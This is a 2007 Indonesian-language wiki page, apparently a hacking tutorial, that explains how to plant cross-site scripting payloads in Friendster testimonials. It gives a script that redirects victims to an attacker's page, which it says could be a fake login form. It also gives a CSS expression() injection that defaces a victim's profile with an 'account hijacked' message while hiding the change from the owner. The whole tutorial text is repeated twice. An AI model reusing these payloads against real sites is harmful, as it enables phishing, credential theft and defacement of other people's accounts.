Sign in or 
Share this
friendster
Friendster... Makin banyak yang maniak, makin banyak para hacker yang mencari ceLah kelemahan ini...
Salah satunya adalah melakukan alih halaman, lewat testimonial yang diberikan..
Langkahnya:
1. Login Friendster
2. Cari Target yang ingin di testi
3. TuLis Testi dengan Format::
_mulai testi_
woi.. Pa Kabar<img id="" width="0"><script>window.location="http://Link-yang-akan-di-tuju.com";</script>
_akhir testi_
Apa yang terjadi??
Pada saat target membuka pending testinya, maka sang target akan dialihkan ke halaman lain yang telah kita buat..
Seperti halaman deface, Form Login palsu, atau apalah iTu.. ntar malah ngerusak imajinasi kalian semua.
Sehingga sang target, tidak dapat membaca pending testimonials yang masuk, karena telah dialihkan ke halaman yang telah kita injeksikan tadi
Hikz..Hikz.. kasian juga ya.. :p
MaaF Kalau ArtikeL ini kelihatan ndeso, katro, ataupun kutukupret. ;p
Mungkin tulisan ini hampir sama dengan re-direct lewat testi di artikel sebelumnya.
Sebenarnya, hal ini bisa diakalin untuk hal- hal yang lebih berguna.
pertama-tama lo cari target lo dulu...(acc fs yg udah masuk friendlist fs lo)
trus...kasih dia testi dengan kata kata lo,,trus masukkin kode dibawah :
misal contoh testi :
___BEGIN OF TESTIMONIAL____
eh...apa kabar?
<img src="" id="mycode" style="height:expr/**/ession(if(pageViewerID!=pageOwnerID){document.write('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>maaph..<br>tapi account fs yg anda liat uda gua bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-friendster gua bajak !!-'}); width:expr/**/ession(document.all.mycode.style.height='0px')" /></img>
___END OF TESTIMONIAL______
perhatikan:
<img src="" id="mycode" style="height:expr/**/ession(
script diatas adalah tag html yg dipake untuk membuka jalan
agar javascript yg kita inject bisa dijalankan.
if(pageViewerID!=pageOwnerID)
fungsi diatas untuk mencegah agar yg punya fs gak
bisa ngliat klo profilenya udah berubah...
jadi perubahan ini cuma bisa dilihat sama orang lain,kecuali pemiliknya.
lalu,
document.write('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>maaph..<br>tapi account fs yg anda liat uda gua bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-friendster gua bajak !!-'});
script diatas adalah script javascript yg fungsinya untuk menuliskan tag html semau kita
kedalam sebuah testi...
sehingga kita bisa merubah seluruh tampilan profile org yg telah mengapprove testi kita..
klo contoh testi diatas dibuka...bentuknya seperti ini :
selama gw coba....trik ini cuma jalan di iexplore...
sebenernya trik diatas bisa diakalin lg untuk kepentingan yg lain....
hehehe
Salah satunya adalah melakukan alih halaman, lewat testimonial yang diberikan..
Langkahnya:
1. Login Friendster
2. Cari Target yang ingin di testi
3. TuLis Testi dengan Format::
_mulai testi_
woi.. Pa Kabar<img id="" width="0"><script>window.location="http://Link-yang-akan-di-tuju.com";</script>
_akhir testi_
Apa yang terjadi??
Pada saat target membuka pending testinya, maka sang target akan dialihkan ke halaman lain yang telah kita buat..
Seperti halaman deface, Form Login palsu, atau apalah iTu.. ntar malah ngerusak imajinasi kalian semua.
Sehingga sang target, tidak dapat membaca pending testimonials yang masuk, karena telah dialihkan ke halaman yang telah kita injeksikan tadi
Hikz..Hikz.. kasian juga ya.. :p
MaaF Kalau ArtikeL ini kelihatan ndeso, katro, ataupun kutukupret. ;p
Mungkin tulisan ini hampir sama dengan re-direct lewat testi di artikel sebelumnya.
Sebenarnya, hal ini bisa diakalin untuk hal- hal yang lebih berguna.
pertama-tama lo cari target lo dulu...(acc fs yg udah masuk friendlist fs lo)
trus...kasih dia testi dengan kata kata lo,,trus masukkin kode dibawah :
misal contoh testi :
___BEGIN OF TESTIMONIAL____
eh...apa kabar?
<img src="" id="mycode" style="height:expr/**/ession(if(pageViewerID!=pageOwnerID){document.write('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>maaph..<br>tapi account fs yg anda liat uda gua bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-friendster gua bajak !!-'}); width:expr/**/ession(document.all.mycode.style.height='0px')" /></img>
___END OF TESTIMONIAL______
perhatikan:
<img src="" id="mycode" style="height:expr/**/ession(
script diatas adalah tag html yg dipake untuk membuka jalan
agar javascript yg kita inject bisa dijalankan.
if(pageViewerID!=pageOwnerID)
fungsi diatas untuk mencegah agar yg punya fs gak
bisa ngliat klo profilenya udah berubah...
jadi perubahan ini cuma bisa dilihat sama orang lain,kecuali pemiliknya.
lalu,
document.write('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>maaph..<br>tapi account fs yg anda liat uda gua bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-friendster gua bajak !!-'});
script diatas adalah script javascript yg fungsinya untuk menuliskan tag html semau kita
kedalam sebuah testi...
sehingga kita bisa merubah seluruh tampilan profile org yg telah mengapprove testi kita..
klo contoh testi diatas dibuka...bentuknya seperti ini :
selama gw coba....trik ini cuma jalan di iexplore...
sebenernya trik diatas bisa diakalin lg untuk kepentingan yg lain....
hehehe
sang_penguasa |
Latest page update: made by sang_penguasa
, Jun 25 2007, 7:51 AM EDT
(about this update
About This Update
friendster
- sang_penguasa
339 words added view changes - complete history) |
|
Keyword tags:
friendster
More Info: links to this page
|
There are no threads for this page.
Be the first to start a new thread.
